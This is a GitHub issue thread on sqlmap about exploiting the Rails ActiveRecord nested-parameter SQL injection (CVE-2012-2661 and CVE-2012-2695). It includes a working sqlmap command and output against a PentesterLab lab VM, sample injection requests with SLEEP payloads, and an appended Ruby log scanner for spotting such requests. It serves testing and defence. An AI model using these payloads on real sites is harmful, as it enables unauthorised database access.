Closed Ogglas closed 9 years ago
Hi, Ogglas.
Do you have an online test case / written case?
No I do not have that at the moment.
Similar environment (CVE-2012-2661) available here though:
Hmm, okay Ogglas. Thanks for the help.
It goes like this. This would require rewriting sqlmap's engine to support automatic injection into parameter names (note: sqlmap can do this if the user manually puts the injection marker * there). This would introduce twice as many requests (1 set for parameter names and 1 set for parameter values). After the required update, this (automatic approach) would be feasible out of the box.
Now, as this is currently an old(-ish) vulnerability, I am voting for leaving details here on how to exploit it in sqlmap (if the user knows that the vulnerability is there or suspects it) rather than messing with the code and introducing twice as many test requests.
More info about the vulnerability and how to exploit it: https://pentesterlab.com/exercises/cve-2012-2661/course
Original URI (testing environment using ISO from https://pentesterlab.com/exercises/cve-2012-2661):
http://192.168.146.133/?id=1
sqlmap run:
python sqlmap.py -u "http://192.168.146.133/?id[information_schema%20WHERE%201%3D1*%20%3B%20--%20.user][1]=1" --eval='import time;uri=uri.replace("user]", "user%d]" % time.time())' --level=3 --risk=3 --time-sec=1
...
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 129 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: http://192.168.146.133:80/?id[information_schema WHERE 1=1 AND SLEEP(1) ; -- .user][1]=1
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
[11:19:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: Apache 2.2.16
back-end DBMS: MySQL 5.0.12
p.s. due to the nature of this vulnerability, the SLEEP statement is being run multiple times (i.e. 1 delayed subquery per table in the information_schema database because of the affected SHOW TABLES statement), so expect VERY SLOW data retrieval
Is there any way to use sqlmap to find this vulnerability?
"The Active Record component in Ruby on Rails before 3.0.14, 3.1.x before 3.1.6, and 3.2.x before 3.2.6 does not properly implement the passing of request data to a where method in an ActiveRecord class, which allows remote attackers to conduct certain SQL injection attacks via nested query parameters that leverage improper handling of nested hashes, a related issue to CVE-2012-2661."
Example CVE-2012-2661:
Request: controller?id=123
Query: SELECT posts.* FROM posts WHERE posts.id = '123'
Request: controller?id[table.column]=123
Query: SELECT posts.* FROM posts WHERE table.column = '123'
Examples CVE-2012-2695:
1)
Request: controller?id=123
Query: SELECT posts.* FROM posts WHERE posts.id = '123'
Request: controller?id[table][column]=123
Query: SELECT posts.* FROM posts WHERE table.column = '123'
2)
Request: controller?id=123
Query: SELECT posts.* FROM posts WHERE posts.id = '123'
Request: controller?id[mysql%20where%20(select%200)%20or%20sleep(1).xxx][yyy]=123
Queries:
SHOW TABLES
SHOW TABLES IN mysql where (select 0) or sleep(1)
(...)
SELECT posts.* FROM posts WHERE mysql where (select 0) or sleep(1).xxx.yyy = '123'
http://www.cvedetails.com/cve/CVE-2012-2695/
http://blog.conviso.com.br/2012/06/ruby-on-rails-sql-injection-cve-2012_15.html
http://seclists.org/oss-sec/2012/q2/504
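Since both CVEs hinge on a scalar parameter arriving as a nested hash (the injection lives in the parameter name, not its value), the shape is easy to spot in access logs. The following is an added detection example written for this page, not code from sqlmap or from the issue; the list of scalar parameter names is an assumption, and the sample requests are the ones quoted above.

```ruby
require "uri"

# Parameter names the application expects as plain scalars (assumption for
# this example; derive the real list from your routes/controllers).
SCALAR_PARAMS = %w[id].freeze

# Key segments that look like SQL rather than a column name: whitespace,
# dots, quotes, parentheses, comment/statement markers or SQL keywords.
SQL_KEY_RE = /\s|[.;'"()\-]|\b(select|where|sleep|union|or|and)\b/i

# Split a nested-hash parameter name such as "id[table][column]" into
# ["id", "table", "column"]; a plain "id" stays ["id"].
def key_path(name)
  base, rest = name.split("[", 2)
  return [name] if rest.nil?
  [base] + rest.chomp("]").split("][")
end

# Inspect one request URI (full URL or path) and return a finding for every
# scalar parameter that arrives as a nested hash, i.e. the shape that reached
# ActiveRecord's where() as "table.column" in the affected versions.
def inspect_query(raw_uri)
  query = raw_uri.split("?", 2)[1]
  return [] if query.nil? || query.empty?
  findings = []
  URI.decode_www_form(query).each do |name, _value|
    path = key_path(name)
    next unless SCALAR_PARAMS.include?(path.first) && path.length > 1
    sql_like = path.drop(1).select { |seg| seg.match?(SQL_KEY_RE) }
    reason = sql_like.empty? ? "nested hash on scalar param" :
                               "sql-like key segment(s): #{sql_like.inspect}"
    findings << { param: path.first, path: path, reason: reason }
  end
  findings
end

# Requests taken from the issue text (first is benign, the rest are the
# CVE-2012-2661 and CVE-2012-2695 shapes).
SAMPLE_REQUESTS = [
  "controller?id=123",
  "controller?id[table.column]=123",
  "controller?id[table][column]=123",
  "controller?id[mysql%20where%20(select%200)%20or%20sleep(1).xxx][yyy]=123",
].freeze

# Run the check over a batch of request URIs and tag each finding with its request.
def scan(requests = SAMPLE_REQUESTS)
  requests.flat_map { |r| inspect_query(r).map { |f| f.merge(request: r) } }
end

scan.each { |f| puts "#{f[:request]} -> #{f[:path].inspect}: #{f[:reason]}" } if __FILE__ == $0
```

Feed it the request column of your web server log; a nested hash on a parameter the application only ever reads as a scalar is worth investigating even when no SQL keyword is present, as the `id[table][column]` case shows.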